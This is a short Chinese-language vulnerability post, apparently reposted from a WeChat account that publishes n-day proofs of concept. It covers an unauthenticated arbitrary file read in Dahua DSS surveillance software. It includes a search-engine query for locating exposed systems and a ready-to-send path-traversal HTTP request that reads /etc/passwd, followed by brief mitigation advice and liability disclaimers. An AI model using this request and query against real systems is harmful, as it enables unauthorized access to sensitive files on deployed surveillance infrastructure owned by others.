内容仅用于学习交流自查使用,由于传播、利用本公众号所提供的POC信息及POC对应脚本而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号nday poc及作者不为此承担任何责任,一旦造成后果请自行承担!如文章有侵权烦请及时告知,我们会立即删除文章并致歉。谢谢!
大华DSS数字监控系统 attachment_downloadByUrlAtt.action接口存在任意文件读取漏洞,未经身份验证的远程攻击者可以利用此漏洞获取系统内部敏感文件信息,使系统处于极不安全的状态。
app="dahua-DSS"
GET /portal/attachment_downloadAtt.action?filePath=../../../../../../etc/passwd HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: close
nuclei
afrog
xray
1、关闭互联网暴露面或接口设置访问权限
2、目前已提供解决方案,请关注厂商主页更新:https://www.dahuatech.com/
原文始发于微信公众号(nday POC):大华DSS数字监控系统attachment_downloadAtt.action任意文件读取(XVE-2024-34436)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论